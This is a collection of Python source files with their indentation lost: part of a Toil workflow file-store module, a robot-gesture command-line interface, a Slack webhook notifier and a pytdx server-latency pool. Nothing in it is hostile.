# A list of tuples of (hashed job id, pid or process running job)
registeredJobs = [(jid, state['pid']) for jid, state in list(nodeInfo.jobState.items())]
for jobID, jobPID in registeredJobs:
if not cls._pidExists(jobPID):
jobState = CachingFileStore._JobState(nodeInfo.jobState[jobID])
logger.warning('Detected that job (%s) prematurely terminated. Fixing the state '
'of the cache.', jobState.jobName)
if not batchSystemShutdown:
logger.debug("Returning dead job's used disk to cache.")
# Delete the old work directory if it still exists, to remove unwanted nlinks.
# Do this only during the life of the program and dont' do it during the
# batch system cleanup. Leave that to the batch system cleanup code.
if os.path.exists(jobState.jobDir):
shutil.rmtree(jobState.jobDir)
nodeInfo.sigmaJob -= jobState.jobReqs
logger.debug('Running user-defined deferred functions.')
cls._runDeferredFunctions(jobState.deferredFunctions)
# Remove job from the cache state file
nodeInfo.jobState.pop(jobID)
def _registerDeferredFunction(self, deferredFunction):
with self._CacheState.open(self) as cacheInfo:
cacheInfo.jobState[self.jobID]['deferredFunctions'].append(deferredFunction)
logger.debug('Registered "%s" with job "%s".', deferredFunction, self.jobName)
class _JobState(object):
"""
This is a utility class to handle the state of a job in terms of it's current disk
requirements, working directory, and job specific files.
"""
def __init__(self, dictObj):
assert isinstance(dictObj, dict)
self.__dict__.update(dictObj)
@classmethod
def updateJobSpecificFiles(cls, outer, jobStoreFileID, filePath, fileSize, cached):
"""
This method will update the job specifc files in the job state object. It deals with
opening a cache lock file, etc.
:param toil.fileStore.CachingFileStore outer: An instance of CachingFileStore
:param str jobStoreFileID: job store Identifier for the file
:param str filePath: The path to the file
:param float fileSize: The size of the file (may be deprecated soon)
:param bool cached: T : F : None :: cached : not cached : mutably read
"""
with outer._CacheState.open(outer) as cacheInfo:
jobState = cls(cacheInfo.jobState[outer.jobID])
jobState.addToJobSpecFiles(jobStoreFileID, filePath, fileSize, cached)
cacheInfo.jobState[outer.jobID] = jobState.__dict__
def addToJobSpecFiles(self, jobStoreFileID, filePath, fileSize, cached):
"""
This is the real method that actually does the updations.
:param jobStoreFileID: job store Identifier for the file
:param filePath: The path to the file
:param fileSize: The size of the file (may be deprecated soon)
:param cached: T : F : None :: cached : not cached : mutably read
"""
# If there is no entry for the jsfID, make one. self.jobSpecificFiles is a default
# dict of default dicts and the absence of a key will return an empty dict
# (equivalent to a None for the if)
if not self.jobSpecificFiles[jobStoreFileID]:
self.jobSpecificFiles[jobStoreFileID][filePath] = fileSize
else:
# If there's no entry for the filepath, create one
if not self.jobSpecificFiles[jobStoreFileID][filePath]:
self.jobSpecificFiles[jobStoreFileID][filePath] = fileSize
# This should never happen
else:
raise RuntimeError()
# Now add the file to the reverse mapper. This will speed up cleanup and local file
# deletion.
self.filesToFSIDs[filePath].add(jobStoreFileID)
if cached:
self.updateJobReqs(fileSize, 'add')
def updateJobReqs(self, fileSize, actions):
"""
This method will update the current state of the disk required by the job after the
most recent cache operation.
:param fileSize: Size of the last file added/removed from the cache
:param actions: 'add' or 'remove'
"""
assert actions in ('add', 'remove')
multiplier = 1 if actions == 'add' else -1
# If the file was added to the cache, the value is subtracted from the requirements,
# and it is added if the file was removed form the cache.
self.jobReqs -= (fileSize * multiplier)
def isPopulated(self):
return self.__dict__ != {}
class HarbingerFile(object):
"""
Represents the placeholder file that harbinges the arrival of a local copy of a file in
the job store.
"""
def __init__(self, fileStore, fileStoreID=None, cachedFileName=None):
"""
Returns the harbinger file name for a cached file, or for a job store ID
:param class fileStore: The 'self' object of the fileStore class
:param str fileStoreID: The file store ID for an input file
:param str cachedFileName: The cache file name corresponding to a given file
"""
# We need either a file store ID, or a cached file name, but not both (XOR).
assert (fileStoreID is None) != (cachedFileName is None)
if fileStoreID is not None:
self.fileStoreID = fileStoreID
cachedFileName = fileStore.encodedFileID(fileStoreID)
else:
self.fileStoreID = fileStore.decodedFileID(cachedFileName)
self.fileStore = fileStore
self.harbingerFileName = '/.'.join(os.path.split(cachedFileName)) + '.harbinger'
def write(self):
self.fileStore.logToMaster('CACHE: Creating a harbinger file for (%s). '
% self.fileStoreID, logging.DEBUG)
with open(self.harbingerFileName + '.tmp', 'w') as harbingerFile:
harbingerFile.write(str(os.getpid()))
# Make this File read only to prevent overwrites
os.chmod(self.harbingerFileName + '.tmp', 0o444)
os.rename(self.harbingerFileName + '.tmp', self.harbingerFileName)
def waitOnDownload(self, lockFileHandle):
"""
This method is called when a readGlobalFile process is waiting on another process to
write a file to the cache.
:param lockFileHandle: The open handle to the cache lock file
"""
while self.exists():
logger.debug('CACHE: Waiting for another worker to download file with ID %s.'
% self.fileStoreID)
# Ensure that the process downloading the file is still alive. The PID will
# be in the harbinger file.
pid = self.read()
if FileStore._pidExists(pid):
# Release the file lock and then wait for a bit before repeating.
flock(lockFileHandle, LOCK_UN)
time.sleep(20)
# Grab the file lock before repeating.
flock(lockFileHandle, LOCK_EX)
else:
# The process that was supposed to download the file has died so we need
# to remove the harbinger.
self._delete()
def read(self):
return int(open(self.harbingerFileName).read())
def exists(self):
return os.path.exists(self.harbingerFileName)
def delete(self):
"""
Acquires the cache lock then attempts to delete the harbinger file.
"""
with self.fileStore.cacheLock():
self._delete()
def _delete(self):
"""
This function assumes you already have the cache lock!
"""
assert self.exists()
self.fileStore.logToMaster('CACHE: Deleting the harbinger file for (%s)' %
self.fileStoreID, logging.DEBUG)
os.remove(self.harbingerFileName)
# Functions related to async updates
def asyncWrite(self):
"""
A function to write files asynchronously to the job store such that subsequent jobs are
not delayed by a long write operation.
"""
try:
while True:
try:
# Block for up to two seconds waiting for a file
args = self.queue.get(timeout=2)
except Empty:
# Check if termination event is signaled
# (set in the event of an exception in the worker)
if self._terminateEvent.isSet():
raise RuntimeError("The termination flag is set, exiting")
continue
# Normal termination condition is getting None from queue
if args is None:
break
inputFileHandle, jobStoreFileID = args
cachedFileName = self.encodedFileID(jobStoreFileID)
# Ensure that the harbinger exists in the cache directory and that the PID
# matches that of this writing thread.
# If asyncWrite is ported to subprocesses instead of threads in the future,
# insert logic here to securely overwrite the harbinger file.
harbingerFile = self.HarbingerFile(self, cachedFileName=cachedFileName)
assert harbingerFile.exists()
assert harbingerFile.read() == int(os.getpid())
# We pass in a fileHandle, rather than the file-name, in case
# the file itself is deleted. The fileHandle itself should persist
# while we maintain the open file handle
with self.jobStore.updateFileStream(jobStoreFileID) as outputFileHandle:
shutil.copyfileobj(inputFileHandle, outputFileHandle)
inputFileHandle.close()
# Remove the file from the lock files
with self._pendingFileWritesLock:
self._pendingFileWrites.remove(jobStoreFileID)
# Remove the harbinger file
harbingerFile.delete()
except:
self._terminateEvent.set()
raise
def _updateJobWhenDone(self):
"""
Asynchronously update the status of the job on the disk, first waiting \
until the writing threads have finished and the input blockFn has stopped \
blocking.
"""
def asyncUpdate():
try:
# Wait till all file writes have completed
for i in range(len(self.workers)):
self.queue.put(None)
for thread in self.workers:
thread.join()
# Wait till input block-fn returns - in the event of an exception
# this will eventually terminate
self.inputBlockFn()
# Check the terminate event, if set we can not guarantee
# that the workers ended correctly, therefore we exit without
# completing the update
if self._terminateEvent.isSet():
raise RuntimeError("The termination flag is set, exiting before update")
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
finally:
# Indicate that _blockFn can return
# This code will always run
self.updateSemaphore.release()
# The update semaphore is held while the job is written to the job store
try:
self.updateSemaphore.acquire()
t = Thread(target=asyncUpdate)
t.start()
except:
# This is to ensure that the semaphore is released in a crash to stop a deadlock
# scenario
self.updateSemaphore.release()
raise
def _blockFn(self):
self.updateSemaphore.acquire()
self.updateSemaphore.release() # Release so that the block function can be recalled
# This works, because once acquired the semaphore will not be acquired
# by _updateJobWhenDone again.
return
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The directory that will contain the cache state file.
"""
cacheInfo = cls._CacheState._load(os.path.join(dir_, '_cacheState'))
cls.findAndHandleDeadJobs(cacheInfo, batchSystemShutdown=True)
shutil.rmtree(dir_)
def __del__(self):
"""
Cleanup function that is run when destroying the class instance that ensures that all the
file writing threads exit.
"""
self.updateSemaphore.acquire()
for i in range(len(self.workers)):
self.queue.put(None)
for thread in self.workers:
thread.join()
self.updateSemaphore.release()
class NonCachingFileStore(FileStore):
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
self.jobStore = jobStore
self.jobGraph = jobGraph
self.jobName = str(self.jobGraph)
self.localTempDir = os.path.abspath(localTempDir)
self.inputBlockFn = inputBlockFn
self.jobsToDelete = set()
self.loggingMessages = []
self.filesToDelete = set()
super(NonCachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, inputBlockFn)
# This will be defined in the `open` method.
self.jobStateFile = None
self.localFileMap = defaultdict(list)
@contextmanager
def open(self, job):
jobReqs = job.disk
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
self.findAndHandleDeadJobs(self.workFlowDir)
self.jobStateFile = self._createJobStateFile()
freeSpace, diskSize = getFileSystemSize(self.localTempDir)
if freeSpace <= 0.1 * diskSize:
logger.warning('Starting job %s with less than 10%% of disk space remaining.',
self.jobName)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Consider modifying the user "
"script to avoid the chance of failure due to incorrectly "
"requested resources. " + logString, level=logging.WARNING)
os.chdir(startingDir)
jobState = self._readJobState(self.jobStateFile)
deferredFunctions = jobState['deferredFunctions']
failures = self._runDeferredFunctions(deferredFunctions)
for failure in failures:
self.logToMaster('Deferred function "%s" failed.' % failure, logging.WARN)
# Finally delete the job from the worker
os.remove(self.jobStateFile)
def writeGlobalFile(self, localFileName, cleanup=False):
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
cleanupID = None if not cleanup else self.jobGraph.jobStoreID
fileStoreID = self.jobStore.writeFile(absLocalFileName, cleanupID)
self.localFileMap[fileStoreID].append(absLocalFileName)
return FileID.forPath(fileStoreID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
else:
localFilePath = self.getLocalTempFileName()
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
self.localFileMap[fileStoreID].append(localFilePath)
return localFilePath
@contextmanager
def readGlobalFileStream(self, fileStoreID):
with self.jobStore.readFileStream(fileStoreID) as f:
yield f
def exportFile(self, jobStoreFileID, dstUrl):
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def deleteLocalFile(self, fileStoreID):
try:
localFilePaths = self.localFileMap.pop(fileStoreID)
except KeyError:
raise OSError(errno.ENOENT, "Attempting to delete a non-local file")
else:
for localFilePath in localFilePaths:
os.remove(localFilePath)
def deleteGlobalFile(self, fileStoreID):
try:
self.deleteLocalFile(fileStoreID)
except OSError as e:
if e.errno == errno.ENOENT:
# the file does not exist locally, so no local deletion necessary
pass
else:
raise
self.filesToDelete.add(fileStoreID)
def _blockFn(self):
# there is no asynchronicity in this file store so no need to block at all
return True
def _updateJobWhenDone(self):
try:
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
def __del__(self):
"""
Cleanup function that is run when destroying the class instance. Nothing to do since there
are no async write events.
"""
pass
# Functions related to the deferred function logic
@classmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
Look at the state of all jobs registered in the individual job state files, and handle them
(clean up the disk, and run any registered defer functions)
:param str nodeInfo: The location of the workflow directory on the node.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
:return:
"""
# A list of tuples of (job name, pid or process running job, registered defer functions)
for jobState in cls._getAllJobStates(nodeInfo):
if not cls._pidExists(jobState['jobPID']):
# using same logic to prevent races as CachingFileStore._setupCache
myPID = str(os.getpid())
cleanupFile = os.path.join(jobState['jobDir'], '.cleanup')
with open(os.path.join(jobState['jobDir'], '.' + myPID), 'w') as f:
f.write(myPID)
while True:
try:
os.rename(f.name, cleanupFile)
except OSError as err:
if err.errno == errno.ENOTEMPTY:
with open(cleanupFile, 'r') as f:
cleanupPID = f.read()
if cls._pidExists(int(cleanupPID)):
# Cleanup your own mess. It's only polite.
os.remove(f.name)
break
else:
os.remove(cleanupFile)
continue
else:
raise
else:
logger.warning('Detected that job (%s) prematurely terminated. Fixing the '
'state of the job on disk.', jobState['jobName'])
if not batchSystemShutdown:
logger.debug("Deleting the stale working directory.")
# Delete the old work directory if it still exists. Do this only during
# the life of the program and dont' do it during the batch system
# cleanup. Leave that to the batch system cleanup code.
shutil.rmtree(jobState['jobDir'])
# Run any deferred functions associated with the job
logger.debug('Running user-defined deferred functions.')
cls._runDeferredFunctions(jobState['deferredFunctions'])
break
@staticmethod
def _getAllJobStates(workflowDir):
"""
Generator function that deserializes and yields the job state for every job on the node,
one at a time.
:param str workflowDir: The location of the workflow directory on the node.
:return: dict with keys (jobName, jobPID, jobDir, deferredFunctions)
:rtype: dict
"""
jobStateFiles = []
for root, dirs, files in os.walk(workflowDir):
for filename in files:
if filename == '.jobState':
jobStateFiles.append(os.path.join(root, filename))
for filename in jobStateFiles:
try:
yield NonCachingFileStore._readJobState(filename)
except IOError as e:
if e.errno == 2:
# job finished & deleted its jobState file since the jobState files were discovered
continue
else:
raise
@staticmethod
def _readJobState(jobStateFileName):
with open(jobStateFileName, 'rb') as fH:
state = dill.load(fH)
return state
def _registerDeferredFunction(self, deferredFunction):
with open(self.jobStateFile, 'rb') as fH:
jobState = dill.load(fH)
jobState['deferredFunctions'].append(deferredFunction)
with open(self.jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(self.jobStateFile + '.tmp', self.jobStateFile)
logger.debug('Registered "%s" with job "%s".', deferredFunction, self.jobName)
def _createJobStateFile(self):
"""
Create the job state file for the current job and fill in the required
values.
:return: Path to the job state file
:rtype: str
"""
jobStateFile = os.path.join(self.localTempDir, '.jobState')
jobState = {'jobPID': os.getpid(),
'jobName': self.jobName,
'jobDir': self.localTempDir,
'deferredFunctions': []}
with open(jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(jobStateFile + '.tmp', jobStateFile)
return jobStateFile
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The workflow directory that will contain all the individual worker directories.
"""
cls.findAndHandleDeadJobs(dir_, batchSystemShutdown=True)
class FileID(str):
"""
A small wrapper around Python's builtin string class. It is used to represent a file's ID in the file store, and
has a size attribute that is the file's size in bytes. This object is returned by importFile and writeGlobalFile.
"""
def __new__(cls, fileStoreID, *args):
return super(FileID, cls).__new__(cls, fileStoreID)
def __init__(self, fileStoreID, size):
# Don't pass an argument to parent class's __init__.
# In Python 3 we can have super(FileID, self) hand us object's __init__ which chokes on any arguments.
super(FileID, self).__init__()
self.size = size
@classmethod
def forPath(cls, fileStoreID, filePath):
return cls(fileStoreID, os.stat(filePath).st_size)
def shutdownFileStore(workflowDir, workflowID):
"""
Run the deferred functions from any prematurely terminated jobs still lingering on the system
and carry out any necessary filestore-specific cleanup.
This is a destructive operation and it is important to ensure that there are no other running
processes on the system that are modifying or using the file store for this workflow.
This is the intended to be the last call to the file store in a Toil run, called by the
batch system cleanup function upon batch system shutdown.
:param str workflowDir: The path to the cache directory
:param str workflowID: The workflow ID for this invocation of the workflow
"""
cacheDir = os.path.join(workflowDir, cacheDirName(workflowID))
if os.path.exists(cacheDir):
# The presence of the cacheDir suggests this was a cached run. We don't need the cache lock
# for any of this since this is the final cleanup of a job and there should be no other
# conflicting processes using the cache.
CachingFileStore.shutdown(cacheDir)
else:
# This absence of cacheDir suggests otherwise.
NonCachingFileStore.shutdown(workflowDir)
class CacheError(Exception):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(CacheError, self).__init__(message)
class CacheUnbalancedError(CacheError):
"""
Raised if file store can't free enough space for caching
"""
message = 'Unable unable to free enough space for caching. This error frequently arises due ' \
'to jobs using more disk than they have requested. Turn on debug logging to see ' \
'more information leading up to this error through cache usage logs.'
def __init__(self):
super(CacheUnbalancedError, self).__init__(self.message)
class IllegalDeletionCacheError(CacheError):
"""
Error Raised if the Toil detects the user deletes a cached file
"""
def __init__(self, deletedFile):
message = 'Cache tracked file (%s) deleted explicitly by user. Use deleteLocalFile to ' \
'delete such files.' % deletedFile
super(IllegalDeletionCacheError, self).__init__(message)
class InvalidSourceCacheError(CacheError):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(InvalidSourceCacheError, self).__init__(message)
|
text_interface.py
|
from __future__ import print_function
import sys, os, re
import argparse, shutil
from .config import RobotConfig
from .sequencerobot import SequenceRobot
import random, time
import threading
from getch import getch
import yaml
import json
#with open(r'..constants.yaml') as file:
#constants = yaml.load(file, Loader=yaml.FullLoader)
# seed time for better randomness
random.seed(time.time())
class CLI():
def __init__(self, robot):
self.robot = robot
self.prior_cmd, self.prior_args = 'rand', []
self.help_text = ("Possible cmd line arguments include:" +
"\nPlay an action:" +
"\n\t Play a random action: rand" +
"\n\t Play a sequence: s" +
"\n" +
"\nMove individual motors: m" +
"\n" +
"\nReload gestures from json sequences: r" +
"\n" +
"\nAdjust Parameters:" +
"\n\t Adjust speed: e" +
"\n\t Adjust amplitude: a" +
"\n\t Adjust posture: p" +
"\n\t Create a new configuration: c" +
"\n" +
"\nExec python command: man" +
"\n" +
"\nList available gestures: l or ls" +
"\n" +
"\nQuit: q" +
"\n" +
"\nEnter without a cmd to replay the last thing"
)
def print_help(self):
print(self.help_text)
def run_cli(self):
"""
Handle CLI inputs indefinitely
Will split off / or | and keep subsequent parts as a list of args
"""
print("\nRunning CLI")
while(1):
# get command string
cmd_str = input("Enter a command ('l' for a list, 'h' for help, 'c' to create a new sequence):")
if cmd_str =="exit": break
cmd_string = re.split('/| ', cmd_str)
cmd = cmd_string[0]
# parse to get argument
args = None
if (len(cmd_string) > 1):
args = cmd_string[1:]
# handle the command and arguments
did_quit = self.handle_input(cmd, args)
if did_quit == 'q': break
print("\nCLI Loop Exit")
def handle_input(self, cmd, args=[]):
"""
handle CLI input
Args:
robot: the robot affected by the given command
cmd: a robot command
args: additional args for the command
"""
if cmd == 's' or cmd == 'rand':
self.play_sequence(cmd, args)
elif cmd == 'r':
# reload gestures
self.robot.load_all_sequences()
elif cmd == 'l' or cmd == 'ls':
self.print_available_sequences(args)
elif cmd == 'q':
self.graceful_exit()
return 'q'
elif cmd == 'm':
self.control_motor(args)
elif cmd == 'e':
self.robot.speed = float(input('Choose Speed factor [range: (0.5 to 2.0)]: '))
elif cmd == 'a':
self.robot.amp = float(input('Choose Amplitude factor [range: (0.5 to 2.0)]: '))
elif cmd == 'p':
self.robot.post = float(input('Choose Posture factor [range: (-150 to 150)]: '))
elif cmd == 'h':
self.print_help()
elif cmd == 'c':
self.prompt_new_sequence()
elif cmd == '':
self.handle_input(self.prior_cmd, self.prior_args)
return ''
elif cmd in self.robot.seq_list.keys():
# directly call a sequence (skip 's')
self.handle_input('s', [cmd])
elif [cmd in seq_name for seq_name in self.robot.seq_list.keys()]:
# directly call a random sequence by partial name match
if 'mix' not in cmd:
seq_list = [seq_name for seq_name in self.robot.seq_list.keys() if cmd in seq_name and 'mix' not in seq_name]
else:
seq_list = [seq_name for seq_name in self.robot.seq_list.keys() if cmd in seq_name]
if len(seq_list) == 0:
print("No sequences matching name: %s" % (cmd))
return ''
self.handle_input('s', [random.choice(seq_list)])
cmd = cmd
else:
print("Invalid input")
return ''
self.prior_cmd, self.prior_args = cmd, args
return ''
def play_sequence(self, cmd, args):
print("Playing Sequence: ", cmd, args)
idle_sep = '='
# if random, choose random sequence
if cmd == 'rand':
args = [random.choice(list(self.robot.seq_list.keys()))]
# default to not idling
# idler = False
# get sequence if not given
if not args:
args = ['']
seq = input('Sequence: ')
else:
seq = args[0]
# check if should be idler
# elif (args[0] == 'idle'):
# args[0] = args[1]
# idler = True
idle_seq = ''
if (idle_sep in seq):
(seq, idle_seq) = re.split(idle_sep + '| ', seq)
# catch hardcoded idle sequences
if(seq == 'random'):
random.seed(time.time())
seq = random.choice(['calm', 'slowlook', 'sideside'])
if(idle_seq == 'random'):
random.seed(time.time())
idle_seq = random.choice(['calm', 'slowlook', 'sideside'])
if (seq == 'calm' or seq == 'slowlook' or seq == 'sideside'):
idle_seq = seq
# play the sequence if it exists
if seq in self.robot.seq_list:
# print("Playing sequence: %s"%(args[0]))
# iterate through all robots
if not self.robot.seq_stop:
self.robot.seq_stop = threading.Event()
self.robot.seq_stop.set()
print(seq)
seq_thread = self.robot.play_recording(seq, idler=False)
# go into idler
if (idle_seq != ''):
while (seq_thread.is_alive()):
# sleep necessary to smooth motion
time.sleep(0.1)
continue
if not self.robot.seq_stop:
self.robot.seq_stop = threading.Event()
self.robot.seq_stop.set()
self.robot.play_recording(idle_seq, idler=True)
# sequence not found
else:
print("Unknown sequence name:", seq)
return
def print_available_sequences(self, args):
if args:
args[0] = args[0].replace('*', '')
for seq_name in self.robot.seq_list.keys():
# skip if argument is not in the current sequence name
if args and args[0] != seq_name[:len(args[0])]:
continue
print(seq_name)
def graceful_exit(self):
"""
Close the robot object and clean up any temporary files.
Manually kill the flask server because there isn't an obvious way to do so gracefully.
"""
# clean up tmp dirs and close robots
tmp_dir = './src/sequences/%s/tmp' % self.robot.name
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.robot.robot.close()
print("Bye!")
def control_motor(self, args):
# get motor and pos if not given
if not args:
args = ['', '']
args[0] = input('Motor (1-3): ')
args[1] = input('Position: ')
if (args[0] == 'all'):
self.robot.goto_position({'tower_1': float(args[1]), 'tower_2': float(
args[1]), 'tower_3': float(args[1])}, 0, True)
else:
self.robot.goto_position({str('tower_'+args[0]): float(args[1])}, 0, True)
def prompt_new_sequence(self):
all_pos = []
millis = 0
new_sequence = input('Please enter the name of sequence you would like to create (enter q to exit): ')
if new_sequence == 'q':return
new_cmd = ''
while(new_cmd != 's'):
new_cmd = self.change_motors()
if(new_cmd == 's'):
new_pos = [{'dof':key,"pos":(value/50+3)} for key,value in self.robot.get_motor_pos().items()]
all_pos.append({"positions":new_pos, "millis": millis})
millis+=3000
new_cmd = input("\nEnter s to save this as your final sequence." +
" Enter p to add another position to this sequence: ")
self.write_position_to_json(all_pos, new_sequence)
#allows the user to change the position of the robot using arrow keys. command is c
def change_motors(self):
moving_motor = input("Enter a motor ID to shift the motor (1, 2, or 3). Press e to end: ")
while(moving_motor != 'e'):
#if one of the tower motors is being controlled
if(int(moving_motor) > 0 and int(moving_motor) < 4):
tower = 'tower_' + str(moving_motor)
print("\n\nUse the up/down arrow keys to move motor " + moving_motor +
".\nPress e to stop moving the motor.\n\n")
key = ord(getch())
if(key == 27):
getch()
key = ord(getch())
if(key == 65):
current_pos = self.robot.get_indiv_motor_pos(tower)
if(current_pos < 140):
self.robot.goto_position({tower: float(current_pos+20)}, 0, True)
else:
self.robot.goto_position({tower: float(150)}, 0, True)
elif(key == 66):
current_pos = self.robot.get_indiv_motor_pos(tower)
if(current_pos > -30):
self.robot.goto_position({tower: float(current_pos-20)}, 0, True)
else:
self.robot.goto_position({tower: float(-40)}, 0, True)
if(key == 101):
moving_motor = 'e'
to_return = input("Press s to save your motor configuration, or m to move another motor: ")
return to_return
#return #str that determines if user is moving more motors or if user is saving motor config
#allows user to save the robots current position to a json file
def write_position_to_json(self, all_pos, new_sequence):
new_sequence = new_sequence + "_sequence.json"
data = {"animation":new_sequence, "frame_list": all_pos}
json_str = json.dumps(data, indent=4)
print(json_str)
target_path = './blossompy/src/sequences/woody/customized'
if not os.path.exists(target_path):
try:
os.makedirs(target_path)
except Exception as e:
print(e)
raise
with open(os.path.join(target_path, new_sequence), 'w') as f:
json.dump(data, f, indent = 4)
# def main(args):
# """
# Start robots, start up server, handle CLI
# ToDo: the multi-robot setup should be a seperate file
# """
# # get robots to start
# # use first name as master
# configs = RobotConfig().get_configs(args.names)
# master_robot = SequenceRobot(args.names[0], configs[args.names[0]])
# configs.pop(args.names[0])
# master_robot.reset_position()
# # start CLI
# cli = CLI(master_robot)
# t = threading.Thread(target=cli.run_cli)
# t.daemon = True
# t.start()
# while True:
# time.sleep(1)
# def parse_args(args):
# """
# Parse arguments from starting in terminal
# args:
# args the arguments from terminal
# returns:
# parsed arguments
# """
# parser = argparse.ArgumentParser()
# parser.add_argument('--names', '-n', type=str, nargs='+',
# help='Name of the robot.', default=["woody"])
# return parser.parse_args(args)
# """
# Generic main handler
# """
# if __name__ == "__main__":
# main(parse_args(sys.argv[1:]))
|
slack.py
|
'''
Use a 'bot' to post message to a Slack channel.
This is useful for error alerts and scheduled notifications.
'''
import json
import threading
import urllib.request
import arrow
# Reference:
# search for 'incoming webhooks for slack'
def post(channel_webhook_url: str, subject: str, text: str) -> None:
dt = arrow.utcnow().to('US/Pacific').format('YYYY-MM-DD HH:mm:ss') + ' Pacific'
json_data = json.dumps({
'text': '--- {} ---\n{}\n{}'.format(subject, dt, text)
}).encode('ascii')
req = urllib.request.Request(
channel_webhook_url, data=json_data,
headers={'Content-type': 'application/json'})
thr = threading.Thread(target=urllib.request.urlopen, args=(req, ))
thr.start()
|
ippool.py
|
#utf-8
import random
import threading
from functools import partial
from pytdx.log import DEBUG, log
import time
from collections import OrderedDict
"""
ips 应该还是一个 (ip ,port) 对的列表,如
[
(ip1, port1),
(ip2, port2),
(ip3, port3),
]
"""
class BaseIPPool(object):
def __init__(self, hq_class):
self.hq_class = hq_class
def setup(self):
pass
def teardown(self):
pass
def sync_get_top_n(self, num):
pass
def add_to_pool(self, ip):
pass
class RandomIPPool(BaseIPPool):
"""
获取一个随机的优先级列表
"""
def __init__(self, hq_class, ips):
"""
:param ips: ip should be a list
"""
super(RandomIPPool, self).__init__(hq_class)
self.ips = ips
def get_ips(self):
random.shuffle(self.ips)
return self.ips
def sync_get_top_n(self, num):
ips= self.get_ips()
return ips[:num]
def add_to_pool(self, ip):
if ip not in self.ips:
self.ips.append(ip)
class AvailableIPPool(BaseIPPool):
"""
测试可连接性,并根据连接速度排序
我们启动一个新的线程,周期性的进行更新
"""
def __init__(self, hq_class, ips):
super(AvailableIPPool, self).__init__(hq_class)
self.ips = ips
self.sorted_ips = None
self.worker_thread = None
self.sorted_ips_lock = threading.Lock()
self.stop_event = threading.Event()
self.wait_interval = 20 * 60
def setup(self):
super(AvailableIPPool, self).setup()
self.worker_thread = threading.Thread(target=self.run)
self.worker_thread.start()
def get_ips(self):
if not self.sorted_ips:
return self.ips
else:
return list(self.sorted_ips.values())
def teardown(self):
self.stop_event.set()
if self.worker_thread.is_alive():
self.worker_thread.join()
self.worker_thread = None
def run(self):
log.debug("pool thread start ")
while not self.stop_event.is_set():
_available_ips = self.get_all_available_ips()
sorted_keys = sorted(_available_ips)
with self.sorted_ips_lock:
self.sorted_ips = OrderedDict((key, _available_ips[key]) for key in sorted_keys)
self.stop_event.wait(self.wait_interval)
def get_all_available_ips(self):
"""
循环测试所有连接的连接速度和有效性
:return:
"""
_available_ips = OrderedDict()
for ip in self.ips:
ip_addr, port = ip
api = self.hq_class(multithread=False, heartbeat=False)
try:
with api.connect(ip_addr, port):
start_ts = time.time()
api.do_heartbeat()
end_ts = time.time()
diff_ts = end_ts - start_ts
_available_ips[diff_ts] = ip
log.debug("time diff is %f for %s" % (diff_ts, _available_ips))
except Exception as e:
log.debug("can not use %s:%d the exception is %s" % (ip_addr, port, str(e)))
continue
return _available_ips
def sync_get_top_n(self, num):
_ips = list(self.get_all_available_ips().values())
return _ips[:min(len(_ips), num)]
def add_to_pool(self, ip):
if ip not in self.ips:
self.ips.append(ip)
if __name__ == "__main__":
from pytdx.hq import TdxHq_API
from pytdx.config.hosts import hq_hosts
import logging
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
log.addHandler(ch)
ips = [(v[1], v[2]) for v in hq_hosts]
pool = AvailableIPPool(TdxHq_API, ips)
pool.wait_interval = 60 * 5
pool.setup()
sleep_time = 130
log.debug("ready to sleep %d" % sleep_time )
time.sleep(sleep_time)
log.debug("sleep done")
ips = pool.get_ips()
log.debug(str(pool.get_ips()))
log.debug("ready to teardown")
